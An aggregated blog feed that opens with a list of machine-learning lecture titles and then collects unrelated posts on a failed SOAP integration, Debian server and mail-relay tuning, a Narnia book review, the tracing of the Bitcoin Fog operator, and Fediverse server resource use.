ML L8: Ensembles und Meta-Learning: Random Forests und Gradient Boosting

ML L9: Support Vector Machinen - Motivation

ML L10: Affine Hyperebenen und Skalarprodukte – Geometrie für SVMs

ML L11: Maximum Margin Hyperplane – die “breitest mögliche Straße”

ML L12: Training Support Vector Machines

ML L13: Non-linear SVM and the Kernel Trick

ML L14: SVM – Extensions and Conclusions

ML L15: Motivation of Neural Networks

ML L16: Threshold Logic Units

ML L17: General Artificial Neural Networks

ML L18: Learning Neural Networks with Backpropagation

ML L19: Deep Neural Networks

ML L20: Convolutional Neural Networks

ML L21: Recurrent Neural Networks and LSTM

ML L22: Conclusion Classification

ML U1: Einleitung Clusteranalyse

ML U2: Hierarchisches Clustering

ML U3: Accelerating HAC mit Anderberg’s Algorithmus

ML U4: k-Means Clustering

ML U5: Accelerating k-Means Clustering

ML U6: Limitations of k-Means Clustering

ML U7: Extensions of k-Means Clustering

ML U8: Partitioning Around Medoids (k-Medoids)

ML U9: Gaussian Mixture Modeling (EM Clustering)

ML U10: Gaussian Mixture Modeling Demo

ML U11: BIRCH and BETULA Clustering

ML U12: Motivation Density-Based Clustering (DBSCAN)

ML U13: Density-reachable and density-connected (DBSCAN Clustering)

ML U14: DBSCAN Clustering

ML U15: Parameterization of DBSCAN

ML U16: Extensions and Variations of DBSCAN Clustering

ML U17: OPTICS Clustering

ML U18: Cluster Extraction from OPTICS Plots

ML U19: Understanding the OPTICS Cluster Order

ML U20: Spectral Clustering

ML U21: Biclustering and Subspace Clustering

ML U22: Further Clustering Approaches

Worse Than FailureA Specified Integration

Shipping meaningful data from one company's IT systems to another company's IT systems is one of those problems that's been solved a billion times, with entirely new failure modes each time. EDI alone has a dozen subspecifications and allows data transfer via everything ranging from FTP to email.

When XML made its valiant attempt to take over the world, XML schemas, SOAP and their associated related specifications were going to solve all these problems. If you needed to communicate how to interact with a service, you could publish a WSDL file. Anyone who needed to talk to your service could scrape the WSDL and automatically "learn" how to send properly formatted messages. The WSDL is, in practice, a contract offered by a web service.

But the WSDL is just one mechanism to provide a specification for software. Which brings us to Patrick.

Patrick needed to be able to transmit financial transactions from one of their internal systems to a vendor in France. Both parties discussed the requirements, what specific fields needed to be sent, how, what they actually meant, and hammered out a specification document that confirmed their understanding. It would be a SOAP-based web service, and the French team would be implementing it on their end.

"Great," Patrick said in one of their meetings. "Once you've got the interface defined according to our specification, you should send us the WSDL file."

The next day, they received a WSDL file. It was a "hello world" file, autogenerated for a stub service with one method- helloWorld.

"That isn't what we're expecting," Patrick emailed back. "Could you please send us a WSDL which implements the spec?"

The next day, Patrick got a fresh WSDL. This one looked vaguely like the specification, in that some of the methods and fields were named correctly, but half of them were missing.

"We don't need to rush this," Patrick said, "so please review the specification and ensure that the WSDL complies with the specification we agreed to."

Two days later, Patrick got a "hello world" WSDL again, followed by a WSDL for a completely unrelated web service.

Over the next few weeks, the vendor team produced a steady stream of WSDL files. Each was incorrect, sometimes wildly off target, sometimes simply missing a few fields. One Thursday, seemingly by accident, the vendor team sent a correct WSDL, and immediately followed up with another one missing half the key fields.

Eventually, they send a WSDL that more-or-less matched the spec, and stopped trying to "fix" it. Development on both sides progressed, at the glacial pace that any enterprise integration project goes. Development happened less often than meetings, and milestones slid by at an absolutely glacial pace.

But even glaciers move. So the day came for the first end-to-end test. Patrick's team sent a SOAP request containing a valid transaction.

They got no response back.

Patrick got his opposite number in France, Jean, on the phone, and explained what he was seeing.

"No," Jean said. "I can see that you are sending requests, but your requests are empty."

"We are not sending empty requests," Patrick said.

"Apologies, but yes, you are."

Patrick's team set up logging and tracked every outgoing request, and its payload. They manually validated it against the WSDL. They programatically validated it against the WSDL.

Patrick went back to Jean with his evidence.

"No, the problem must be on your side."

"Well, I've provided my logs," Patrick said. "What logging are you getting on your side? Maybe something in the middle is messing things up?"

"One moment," Jean said. Patrick listened to him typing for a bit, and then some puzzled mumbling. Then a long stretch of silence.

"Uh, Jean?"

The silence stretched longer.

"You still there?"

"Oui," Jean said, distantly. "I… ah, I cannot find the logs. Well, I can find logs, just not, the logs for this service. It appears it is not installed on our test server."

"You… didn't install it? The thing we're explicitly testing? It's not installed."

"Yes. I do not have permissions to release that code. I'll have to set up a meeting."

They aborted the test that day, and for many days thereafter. When they did finally test, the vendor team deployed an old version, with a "hello world" WSDL. Eventually, the customer that requested this integration got frustrated with waiting, and switched to a different set of vendors that could actually communicate with each other. To this day, that test server is still probably running with a "hello world" WSDL.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

Planet DebianBenjamin Mako Hill: NSF CAREER Award

In exciting professional news, it was recently announced that I got an National Science Foundation CAREER award! The CAREER is the US NSF’s most prestigious award for early-career faculty. In addition to the recognition, the award involves a bunch of money for me to put toward my research over the next 5 years. The Department of Communication at the University of Washington has put up a very nice web page announcing the thing. It’s all very exciting and a huge honor. I’m very humbled.

The grant will support a bunch of new research to develop and test a theory about the relationship between governance and online community lifecycles. If you’ve been reading this blog for a while, you’ll know that I’ve been involved in a bunch of research to describe how peer production communities tend to follow common patterns of growth and decline as well as a studies that show that many open communities become increasingly closed in ways that deter lots of the kinds contributions that made the communities successful in the first place.

Over the last few years, I’ve worked with Aaron Shaw to develop the outlines of an explanation for why many communities because increasingly closed over time in ways that hurt their ability to integrate contributions from newcomers. Over the course of the work on the CAREER, I’ll be continuing that project with Aaron and I’ll also be working to test that explanation empirically and to develop new strategies about what online communities can do as a result.

In addition to supporting research, the grant will support a bunch of new outreach and community building within the Community Data Science Collective. In particular, I’m planning to use the grant to do a better job of building relationships with community participants, community managers, and others in the platforms we study. I’m also hoping to use the resources to help the CDSC do a better job of sharing our stuff out in ways that are useful as well doing a better job of listening and learning from the communities that our research seeks to inform.

There are many to thank. The proposed work was the direct research of the work I did as the Center for Advanced Studies in the Behavioral Sciences at Stanford where I got to spend the 2018-2019 academic year in Claude Shannon’s old office and talking through these ideas with an incredible range of other scholars over lunch every day. It’s also the product of years of conversations with Aaron Shaw and Yochai Benkler. The proposal itself reflects the excellent work of the whole CDSC who did the work that made the award possible and provided me with detailed feedback on the proposal itself.


Cryptogram Identifying the Person Behind Bitcoin Fog

The person behind the Bitcoin Fog was identified and arrested. Bitcoin Fog was an anonymization service: for a fee, it mixed a bunch of people’s bitcoins up so that it was hard to figure out where any individual coins came from. It ran for ten years.

Identifying the person behind Bitcoin Fog serves as an illustrative example of how hard it is to be anonymous online in the face of a competent police investigation:

Most remarkable, however, is the IRS’s account of tracking down Sterlingov using the very same sort of blockchain analysis that his own service was meant to defeat. The complaint outlines how Sterlingov allegedly paid for the server hosting of Bitcoin Fog at one point in 2011 using the now-defunct digital currency Liberty Reserve. It goes on to show the blockchain evidence that identifies Sterlingov’s purchase of that Liberty Reserve currency with bitcoins: He first exchanged euros for the bitcoins on the early cryptocurrency exchange Mt. Gox, then moved those bitcoins through several subsequent addresses, and finally traded them on another currency exchange for the Liberty Reserve funds he’d use to set up Bitcoin Fog’s domain.

Based on tracing those financial transactions, the IRS says, it then identified Mt. Gox accounts that used Sterlingov’s home address and phone number, and even a Google account that included a Russian-language document on its Google Drive offering instructions for how to obscure Bitcoin payments. That document described exactly the steps Sterlingov allegedly took to buy the Liberty Reserve funds he’d used.

LongNowPlay inspired by Long Now premieres this month

Gutter Street, a London-based theatre company, is premiering a play called The Long Now later this month. “The Long Now is inspired by the work of the @longnow foundation and takes a look at the need to promote long term thinking through our unique Gutter Street Lens,” the company said on Twitter.

Play summary:

Tudor is the finest clockmaker of all time. She knows her cogs from her clogs but will she be able to finish fixing her town’s ancient clock before time runs out? She is distracted by the beast that twists her dreams into nightmares and the wonder of the outside world. In search for the right tools in her trusty pile of things, will she finally finish the job she started…or will she just have another cup of tea?

More info and tickets here.

Worse Than FailureCodeSOD: A Real Switcheroo

Much of the stories and code we see here are objectively bad. Many of them are bad when placed into the proper context. Sometimes we're just opinionated. And sometimes, there's just something weird that treads the line between being an abuse of code, and almost being smart. Almost.

Nic was debugging some Curses-based code, and found this "solution" to handling arrow key inputs:

switch (val) { case ERR: // [snip] default: switch (val) { case 65: // [snip] case 66: // [snip] case 67: // [snip] case 68: // [snip] } }

The obvious badness here is the nested switch. Clearly, this isn't necessary. Putting the ERR check at the top makes sense. But burying a second switch under the default clause is pointless and weird. Given that this is C, and switches have weird power, I'm sure there's probably some bad side effect of doing this. Even if there isn't, it isn't needed.

But. It's almost smart. There's one thing that leaps out to me in this code: that there are two distinct paths, one for error-handling, and one for processing input. It's a weird way to accomplish that goal, mind you, but it does accomplish that goal. I'd still never do it, because almost smart is way worse than actually smart (and also way worse than really stupid). But I guess I can sympathize with the developer.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Planet DebianRussell Coker: DNS, Lots of IPs, and Postal

I decided to start work on repeating the tests for my 2006 OSDC paper on Benchmarking Mail Relays [1] and discover how the last 15 years of hardware developments have changed things. There have been software changes in that time too, but nothing that compares with going from single core 32bit systems with less than 1G of RAM and 60G IDE disks to multi-core 64bit systems with 128G of RAM and SSDs. As an aside the hardware I used in 2006 wasn’t cutting edge and the hardware I’m using now isn’t either. In both cases it’s systems I bought second hand for under $1000. Pedants can think of this as comparing 2004 and 2018 hardware.


I decided to make some changes to reflect the increased hardware capacity and use 2560 domains and IP addresses, which gave the following errors as well as a startup time of a minute on a system with two E5-2620 CPUs.

May  2 16:38:37 server named[7372]: listening on IPv4 interface lo,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:38:37 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv4 interface eno4,
May  2 16:39:33 server named[7372]: listening on IPv6 interface lo, ::1#53
May  2 16:39:36 server named[7372]: zone localhost/IN: loaded serial 2
May  2 16:39:36 server named[7372]: all zones loaded
May  2 16:39:36 server named[7372]: running
May  2 16:39:36 server named[7372]: socket: file descriptor exceeds limit (123273/21000)
May  2 16:39:36 server named[7372]: managed-keys-zone: Unable to fetch DNSKEY set '.': not enough free resources
May  2 16:39:36 server named[7372]: socket: file descriptor exceeds limit (123273/21000)

The first thing I noticed is that a default configuration of BIND with 2560 local IPs (when just running in the default recursive mode) takes a minute to start and needed to open over 100,000 file handles. BIND also had some errors in that configuration which led to it not accepting shutdown requests. I filed Debian bug report #987927 [2] about this. One way of dealing with the errors in this situation on Debian is to edit /etc/default/named and put in the following line to allow BIND to access to many file handles:

OPTIONS="-u bind -S 150000"

But the best thing to do for BIND when there are many IP addresses that aren’t going to be used for DNS service is to put a directive like the following in the BIND configuration to specify the IP address or addresses that are used for the DNS service:

listen-on {; };

I have just added the listen-on and listen-on-v6 directives to one of my servers with about a dozen IP addresses. While 2560 IP addresses is an unusual corner case it’s not uncommon to have dozens of addresses on one system.


When doing tests of Postfix for relaying mail I noticed that mail was being deferred with DNS problems (error was “Host or domain name not found. Name service error for type=MX: Host not found, try again“. I tested the DNS lookups with dig which failed with errors like the following:

dig -t mx
socket.c:1740: internal_send: Invalid argument
socket.c:1740: internal_send: Invalid argument
socket.c:1740: internal_send: Invalid argument

; <
> DiG 9.16.13-Debian <
> -t mx
;; global options: +cmd
;; connection timed out; no servers could be reached

Here is a sample of the strace output from tracing dig:

bind(20, {sa_family=AF_INET, sin_port=htons(0), 
sin_addr=inet_addr("")}, 16) = 0
recvmsg(20, {msg_namelen=128}, 0)       = -1 EAGAIN (Resource temporarily 
write(4, "\24\0\0\0\375\377\377\377", 8) = 8
sendmsg(20, {msg_name={sa_family=AF_INET, sin_port=htons(53), 
sin_addr=inet_addr("")}, msg_
namelen=16, msg_iov=[{iov_base="86\1 
\0\0\f\0\n\0\10's\367\265\16bx\354", iov_len=57}], msg_iovlen=1, 
msg_controllen=0, msg_flags=0}, 0) 
= -1 EINVAL (Invalid argument)
write(2, "socket.c:1740: ", 15)         = 15
write(2, "internal_send: Invalid argument", 45) = 45
write(2, "\n", 1)                       = 1
futex(0x7f5a80696084, FUTEX_WAIT_PRIVATE, 0, NULL) = 0
futex(0x7f5a80696010, FUTEX_WAKE_PRIVATE, 1) = 0
futex(0x7f5a8069809c, FUTEX_WAKE_PRIVATE, 1) = 1
futex(0x7f5a80698020, FUTEX_WAKE_PRIVATE, 1) = 1
sendmsg(20, {msg_name={sa_family=AF_INET, sin_port=htons(53), 
sin_addr=inet_addr("")}, msg_namelen=16, msg_iov=[{iov_base="86\1 
iov_len=57}], msg_iovlen=1, msg_controllen=0, msg_flags=0}, 0) = -1 EINVAL 
(Invalid argument)
write(2, "socket.c:1740: ", 15)         = 15
write(2, "internal_send: Invalid argument", 45) = 45
write(2, "\n", 1)

Ubuntu bug #1702726 claims that an insufficient ARP cache was the cause of dig problems [3]. At the time I encountered the dig problems I was seeing lots of kernel error messages “neighbour: arp_cache: neighbor table overflow” which I solved by putting the following in /etc/sysctl.d/mine.conf:

net.ipv4.neigh.default.gc_thresh3 = 4096
net.ipv4.neigh.default.gc_thresh2 = 2048
net.ipv4.neigh.default.gc_thresh1 = 1024

Making that change (and having rebooted because I didn’t need to run the server overnight) didn’t entirely solve the problems. I have seen some DNS errors from Postfix since then but they are less common than before. When they happened I didn’t have that error from dig. At this stage I’m not certain that the ARP change fixed the dig problem although it seems likely (it’s always difficult to be certain that you have solved a race condition instead of made it less common or just accidentally changed something else to conceal it). But it is clearly a good thing to have a large enough ARP cache so the above change is probably the right thing for most people (with the possibility of changing the numbers according to the required scale). Also people having that dig error should probably check their kernel message log, if the ARP cache isn’t the cause then some other kernel networking issue might be related.

Preliminary Results

With Postfix I’m seeing around 24,000 messages relayed per minute with more than 60% CPU time idle. I’m not sure exactly how to count idle time when there are 12 CPU cores and 24 hyper-threads as having only 1 process scheduled for each pair of hyperthreads on a core is very different to having half the CPU cores unused. I ran my script to disable hyper-threads by telling the Linux kernel to disable each processor core that has the same core ID as another, it was buggy and disabled the second CPU altogether (better than finding this out on a production server). Going from 24 hyper-threads of 2 CPUs to 6 non-HT cores of a single CPU didn’t change the thoughput and the idle time went to about 30%, so I have possibly halved the CPU capacity for these tasks by disabling all hyper-threads and one entire CPU which is surprising given that I theoretically reduced the CPU power by 75%. I think my focus now has to be on hyper-threading optimisation.

Since 2006 the performance has gone from ~20 messages per minute on relatively commodity hardware to 24,000 messages per minute on server equipment that is uncommon for home use but which is also within range of home desktop PCs. I think that a typical desktop PC with a similar speed CPU, 32G of RAM and SSD storage would give the same performance. Moore’s Law (that transistor count doubles approximately every 2 years) is often misquoted as having performance double every 2 years. In this case more than 1024* the performance over 15 years means the performance doubling every 18 months. Probably most of that is due to SATA SSDs massively outperforming IDE hard drives but it’s still impressive.


I’ve been using for test purposes for a long time, but RFC2606 specifies .test, .example, and .invalid as reserved top level domains for such things. On the next iteration I’ll change my scripts to use .test.

My current test setup has a KVM virtual machine running my bhm program to receive mail which is taking between 20% and 50% of a CPU core in my tests so far. While that is happening the kvm process is reported as taking between 60% and 200% of a CPU core, so kvm takes as much as 4* the CPU of the guest due to the virtual networking overhead – even though I’m using the virtio-net-pci driver (the most efficient form of KVM networking for emulating a regular ethernet card). I’ve also seen this in production with a virtual machine running a ToR relay node.

I’ve fixed a bug where Postal would try to send the SMTP quit command after encountering a TCP error which would cause an infinite loop and SEGV.

Planet DebianRuss Allbery: Review: The Voyage of the Dawn Treader

Review: The Voyage of the Dawn Treader, by C.S. Lewis

Illustrator: Pauline Baynes
Series: Chronicles of Narnia #3
Publisher: Collier Books
Copyright: 1952
Printing: 1978
ISBN: 0-02-044260-2
Format: Mass market
Pages: 216

There was a boy named Eustace Clarence Scrubb and he almost deserved it.

The Voyage of the Dawn Treader is the third Narnia book in original publication order (see my review of The Lion, the Witch and the Wardrobe for more about reading order). You could arguably start reading here; there are a lot of references to the previous books, but mostly as background material, and I don't think any of it is vital. If you wanted to sample a single Narnia book to see if you'd get along with the series, this is the one I'd recommend.

Since I was a kid, The Voyage of the Dawn Treader has held the spot of my favorite of the series. I'm happy to report that it still holds up. Apart from one bit that didn't age well (more on that below), this is the book where the story and the world-building come together, in part because Lewis picks a plot shape that works with what he wants to write about.

The younger two Pevensie children, Edmund and Lucy, are spending the summer with Uncle Harold and Aunt Alberta because their parents are in America. That means spending the summer with their cousin Eustace. C.S. Lewis had strong opinions about child-raising that crop up here and there in his books, and Harold and Alberta are his example of everything he dislikes: caricatured progressive, "scientific" parents who don't believe in fiction or mess or vices. Eustace therefore starts the book as a terror, a whiny bully who has only read boring practical books and is constantly scoffing at the Pevensies and making fun of their stories of Narnia. He is therefore entirely unprepared when the painting of a ship in the guest bedroom turns into a portal to the Narnia and dumps the three children into the middle of the ocean.

Thankfully, they're in the middle of the ocean near the ship in the painting. That ship is the Dawn Treader, and onboard is Caspian from the previous book, now king of Narnia. He has (improbably) sorted things out in his kingdom and is now on a sea voyage to find seven honorable Telmarine lords who left Narnia while his uncle was usurping the throne. They're already days away from land, headed towards the Lone Islands and, beyond that, into uncharted seas.


Obviously, Eustace gets a redemption arc, which is roughly the first half of this book. It's not a bad arc, but I am always happy when it's over. Lewis tries so hard to make Eustace insufferable that it becomes tedious. As an indoor kid who would not consider being dumped on a primitive sailing ship to be a grand adventure, I wanted to have more sympathy for him than the book would allow.

The other problem with Eustace's initial character is that Lewis wants it to stem from "modern" parenting and not reading the right sort of books, but I don't buy it. I've known kids whose parents didn't believe in fiction, and they didn't act anything like this (and kids pick up a lot more via osmosis regardless of parenting than Lewis seems to realize). What Eustace acts like instead is an entitled, arrogant rich kid who is used to the world revolving around him, and it's fascinating to me how Lewis ignores class to focus on educational philosophy.

The best part of Eustace's story is Reepicheep, which is just setup for Reepicheep becoming the best part of The Voyage of the Dawn Treader.

Reepicheep, the leader of Narnia's talking mice, first appears in Prince Caspian, but there he's mostly played for laughs: the absurdly brave and dashing mouse who rushes into every fight he sees. In this book, he comes into his own as the courage and occasionally the moral conscience of the party. Caspian wants to explore and to find the lords of his past, the Pevensie kids want to have a sea adventure, and Eustace is in this book to have a redemption arc, but Reepicheep is the driving force at the heart of the voyage. He's going to Aslan's country beyond the sea, armed with a nursemaid's song about his destiny and a determination to be his best and most honorable self every step of the way, and nothing is going to stop him.

Eustace, of course, takes an immediate dislike to a talking rodent. Reepicheep, in return, is the least interested of anyone on the ship in tolerating Eustace's obnoxious behavior and would be quite happy to duel him. But when Eustace is turned into a dragon, Reepicheep is the one who spends hours with him, telling him stories and ensuring he's not alone. It's beautifully handled, and my only complaint is that Lewis doesn't do enough with the Eustace and Reepicheep friendship (or indeed with Eustace at all) for the rest of the book.

After Eustace's restoration and a few other relatively short incidents comes the second long section of the book and the part that didn't age well: the island of the Dufflepuds. It's a shame because the setup is wonderful: a cultivated island in the middle of nowhere with no one in sight, mysterious pounding sounds and voices, the fun of trying to figure out just what these invisible creatures could possibly be, and of course Lucy's foray into the second floor of a house, braving the lair of a magician to find and read one of the best books of magic in fantasy.

Everything about how Lewis sets this scene is so well done. The kids are coming from an encounter with a sea serpent and a horrifically dangerous magic island and land on this scene of eerily normal domesticity. The most dangerous excursion is Lucy going upstairs in a brightly lit house with soft carpet in the middle of the day. And yet it's incredibly tense because Lewis knows exactly how to put you in Lucy's head, right down to having to stand with her back to an open door to read the book.

And that book! The pages only turn forward, the spells are beautifully illustrated, and the sense of temptation is palpable. Lucy reading the eavesdropping spell is one of the more memorable bits in this series, at least for me, and makes a surprisingly subtle moral point about the practical reasons why invading other people's privacy is unwise and can just make you miserable. And then, when Lucy reads the visibility spell that was her goal, there's this exchange, which is pure C.S. Lewis:

"Oh Aslan," said she, "it was kind of you to come."

"I have been here all the time," said he, "but you have just made me visible."

"Aslan!" said Lucy almost a little reproachfully. "Don't make fun of me. As if anything I could do would make you visible!"

"It did," said Aslan. "Did you think I wouldn't obey my own rules?"

I love the subtlety of what's happening here: the way that Lucy is much more powerful than she thinks she is, but only because Aslan decided to make the rules that way and chooses to follow his own rules, making himself vulnerable in a fascinating way. The best part is that Lewis never belabors points like this; the characters immediately move on to talk about other things, and no one feels obligated to explain.

But, unfortunately, along with the explanation of the thumping and the magician, we learn that the Dufflepuds are (remarkably dim-witted) dwarfs, the magician is their guardian (put there by Aslan, no less!), he transformed them into rather absurd shapes that they hate, and all of this is played for laughs. Once you notice that these are sentient creatures being treated essentially like pets (and physically transformed against their will), the level of paternalistic colonialism going on here is very off-putting. It's even worse that the Dufflepuds are memorably funny (washing dishes before dinner to save time afterwards!) and are arguably too dim to manage on their own, because Lewis made the authorial choice to write them that way. The "white man's burden" feeling is very strong.

And Lewis could have made other choices! Coriakin the magician is a fascinating and somewhat morally ambiguous character. We learn later in the book that he's a star and his presence on the island is a punishment of sorts, leading to one of my other favorite bits of theology in this book:

"My son," said Ramandu, "it is not for you, a son of Adam, to know what faults a star can commit."

Lewis could have kept most of the setup, kept the delightfully silly things the Dufflepuds believe, changed who was responsible for their transformation, and given Coriakin a less authoritarian role, and the story would have been so much stronger for it.

After this, the story gets stranger and wilder, and it's in the last part that I think the true magic of this book lies. The entirety of The Voyage of the Dawn Treader is a progression from a relatively mundane sea voyage to something more awe-inspiring. The last few chapters are a tour de force of wonder: rejuvenating stars, sunbirds, the Witch's stone knife, undersea kingdoms, a sea of lilies, a wall of water, the cliffs of Aslan's country, and the literal end of the world. Lewis does it without much conflict, with sparse description in a very few pages, and with beautifully memorable touches like the quality of the light and the hush that falls over the ship.

This is the part of Narnia that I point to and wonder why I don't see more emulation (although I should note that it is arguably an immram). Tolkien-style fantasy, with dwarfs and elves and magic rings and great battles, is everywhere, but I can't think of many examples of this sense of awe and discovery without great battles and detailed explanations. Or of characters like Reepicheep, who gets one of the best lines of the series:

"My own plans are made. While I can, I sail east in the Dawn Treader. When she fails me, I paddle east in my coracle. When she sinks, I shall swim east with my four paws. And when I can swim no longer, if I have not reached Aslan's country, or shot over the edge of the world in some vast cataract, I shall sink with my nose to the sunrise and Peepiceek shall be the head of the talking mice in Narnia."

The last section of The Voyage of the Dawn Treader is one of my favorite endings of any book precisely because it's so different than the typical ending of a novel. The final return to England is always a bit disappointing in this series, but it's very short and is preceded by so much wonder that I don't mind. Aslan does appear to the kids as a lamb at the very end of the world, making Lewis's intended Christian context a bit more obvious, but even that isn't belabored, just left there for those who recognize the symbolism to notice.

I was curious during this re-read to understand why The Voyage of the Dawn Treader is so much better than the first two books in the series. I think it's primarily due to two things: pacing, and a story structure that's better aligned with what Lewis wants to write about.

For pacing, both The Lion, the Witch and the Wardrobe and Prince Caspian have surprisingly long setups for short books. In The Voyage of the Dawn Treader, by contrast, it takes only 35 pages to get the kids in Narnia, introduce all the characters, tour the ship, learn why Caspian is off on a sea voyage, establish where this book fits in the Narnian timeline, and have the kids be captured by slavers. None of the Narnia books are exactly slow, but Dawn Treader is the first book of the series that feels like it knows exactly where it's going and isn't wasting time getting there.

The other structural success of this book is that it's a semi-episodic adventure, which means Lewis can stop trying to write about battles and political changes whose details he's clearly not interested in and instead focus wholeheartedly on sense-of-wonder exploration. The island-hopping structure lets Lewis play with ideas and drop them before they wear out their welcome. And the lack of major historical events also means that Aslan doesn't have to come in to resolve everything and instead can play the role of guardian angel.

I think The Voyage of the Dawn Treader has the most compelling portrayal of Aslan in the series. He doesn't make decisions for the kids or tell them directly what to do the way he did in the previous two books. Instead, he shows up whenever they're about to make a dreadful mistake and does just enough to get them to make a better decision. Some readers may find this takes too much of the tension out of the book, but I have always appreciated it. It lets nervous child readers enjoy the adventures while knowing that Aslan will keep anything too bad from happening. He plays the role of a protective but non-interfering parent in a genre that usually doesn't have parents because they would intervene to prevent adventures.

I enjoyed this book just as much as I remembered enjoying it during my childhood re-reads. Still the best book of the series.

This, as with both The Lion, the Witch and the Wardrobe and Prince Caspian, was originally intended to be the last book of the series. That, of course, turned out to not be the case, and The Voyage of the Dawn Treader is followed (in both chronological and original publication order) by The Silver Chair.

Rating: 9 out of 10

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 05)

This week on my podcast, part five of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Planet DebianJunichi Uekawa: First email from my new machine.

First email from my new machine. I didn't have my desktop Debian machine for a long time and now I have one set up. I rewrote my procmail/formail recipe, especially the part where I wrote complex shell script to generate my folder rules. I rewrote that 4 lines of shell script in 200 lines of Go, with unit tests. The part that took the longest time was finding out how to write unit tests in Go, and how to properly use go.mod to be able to import packages from subdirectories. I guess that's part of the fun.


Planet DebianSantiago García Mantiñán: Windows and Linux software Raid dual boot BIOS machine

One could think that nowadays having a machine with software raid doing dual boot should be easy, but... my experience showed that it is not that easy.

Having a Windows machine do software raid is easy (I still don't understand why it doesn't really work like it should, but that is because I'm used to Linux software raid), and having software raid on Linux is also really easy. But doing so on a BIOS booted machine, on mbr disks (as Windows doesn't allow GPT on BIOS) is quite a pain.

The problem is how Windows does all this, with it's dynamic disks. What happens with this is that you get from a partitioning like this:

/dev/sda1 * 2048 206847 204800 100M 7 HPFS/NTFS/exFAT /dev/sda2 206848 312580095 312373248 149G 7 HPFS/NTFS/exFAT /dev/sda3 312580096 313165823 585728 286M 83 Linux /dev/sda4 313165824 957698047 644532224 307,3G fd Linux raid autodetect

To something like this:

/dev/sda1 63 2047 1985 992,5K 42 SFS /dev/sda2 * 2048 206847 204800 100M 42 SFS /dev/sda3 206848 312580095 312373248 149G 42 SFS /dev/sda4 312580096 976769006 664188911 316,7G 42 SFS

These are the physical partitions as seen by fdisk, logical partitions are still like before, of course, so there is no problem in accesing them under Linux or windows, but what happens here is that Windows is using the first sectors for its dynamic disks stuff, so... you cannot use those to write grub info there :-(

So... the solution I found here was to install Debian's mbr and make it boot grub, but then... where do I store grub's info?, well, to do this I'm using a btrfs /boot which is on partition 3, as btrfs has room for embedding grub's info, and I setup the software raid with ext4 on partition 4, like you can see on my first partition dump. Of course, you can have just btrfs with its own software raid, then you don't need the fourth partition or anything.

There are however some caveats on doing all this, what I found was that I had to install grub manually using grub-install --no-floppy on /dev/sda3 and /dev/sdb3, as Debian's grub refused to give me the option to install there, also... several warnings came as a result, but things work ok anyway.

One more warning, I did all this on Buster, but it looks like for Grub 2.04 which is included on Bullseye, things have gotten a bit bigger, so at least on my partitions there was no room for it, so I had to leave the old Buster's grub around for now, if anybody has any ideas on how to solve this... they are welcome.


Planet DebianIngo Juergensmann: The Fediverse – What About Resources?

Today ist May, 1st. In about two weeks on May, 15th WhatsApp will put their changed Terms of Service into action and when you don’t accept their rules you won’t be able to use WhatsApp any longer.

Early this year there was already a strong movement away from WhatsApp towards other solutions. Mainly to Signal, but also some other services like the Fediverse gained some new users. And also XMPP got their fair share of new users.

So, what to do about the WhatsApp ToS change then? Shall we go all to Signal? Surely not. Signal is another vendor lock-in silo. It’s centralistic and recent development plans want to implement some crypto payment system. Even Bruce Schneier thinks that this is a bad idea.

Other alternatives often named include Matrix/Element or XMPP. Today, Don di Dislessia in the (german) Fediverse asked about power consumption of the Fediverse incl. Matrix and XMPP and how much renewable energy is being used. Of course this is no easy answer to this question, but I tried my best – at least for my own server.

Here are my findings and conclusions…


screenshot showing power consumption of serverscreenshot showing power consumption of server

Currently my server in the colocation is using about 93W in average with 6c Xeon E5-2630L, 128 GB RAM, 4x 2 TB WD Red + 1 Samsung 960pro NVMe. The server is 7 years old. When I started with that server the power consumption was about 75W, but back then there were far less users on the server. So, 20W more over the past year…


I’m running my Friendica node on since 2013. Over the years it became one of the largest Friendica servers in the Fediverse, for some time it was the largest one. It has currently like 700 total users and 180 monthly active users. My Mastodon instance on has about 1000 total users and about 300 monthly active users.

Since last year I also run a Matrix-Synapse server. Although I invited my family I’m in fact the only active user on that server and have joined some channels.

My XMPP server is even older than my Friendica node. For long time I had like maybe 20 users. Now I setup a new website and added some domains like and the user count increased and currently I have like 130 users on those two domains and maybe like 50 monthly active users. Also note that all my Friendica and Mastodon users can use XMPP with their accounts, but won’t be counted the same way as on “native” users on ejabberd, because the auth backend is different.

So, let’s assume I do have like 2000 total users and 500 monthly active users.

CPU, Database Sizes and Disk I/O

Let’s have a look about how many resources are being used by those users.

Database Sizes:

  • Friendica (MariaDB): 31 GB for 700 users
  • Mastodon (PostgreSQL): 15 GB for 1000 users
  • Matrix-Synapse (PostgreSQL): 5 GB for 1 user
  • XMPP (PostgreSQL): 0.4 GB for 200 users

CPU times according to xentop:

  • Webserver VM (Matrix, Friendica & Mastodon): 13410130 s / 130%
  • XMPP VM: 944275 s / 5.4%

Friendica does use the largest database and causes most disk I/O on NVMe, but it’s difficult to differentiate between the load between the web apps on the webserver. So, let’s have a quick look on an simple metric:

Number of lines in webserver logfile:

  • Friendica: 11575 lines
  • Matrix: 8174 lines
  • Mastodon: 3212 lines

These metrics correlate to some degree with the database I/O load, at least for Friendica. If you take into account the number of users, things look quite different.


Overall, and my personal impression, is that Matrix is really bad in regards of resource usage. Given that I’m the only active user it uses exceptionally many resources. When you also consider that Matrix is using a distributed database for its chat rooms, you can assume that the resource usage is multiplied across the network, making things even worse.

Friendica is using a large database and many disk accesses, but has a fairly large user base, so it seems ok, but of course should be improved.

Mastodon seems to be quite good, considering the database size, the number of log lines and the user count.

XMPP turns out to be the most efficient contestant in this comparison: it uses much less CPU cycles and database disk I/O.

Of course, Mastdon/Friendica are different services than XMPP or Matrix. So, coming back to the initial question about alternatives to WhatsApp, the answer for me is: you should prefer XMPP over Matrix alone for reasons of saving resources and thus reducing power consumption. Less power consumption also means a smaller ecological footprint and fewer CO2 emissions for your communication with your family and friends.

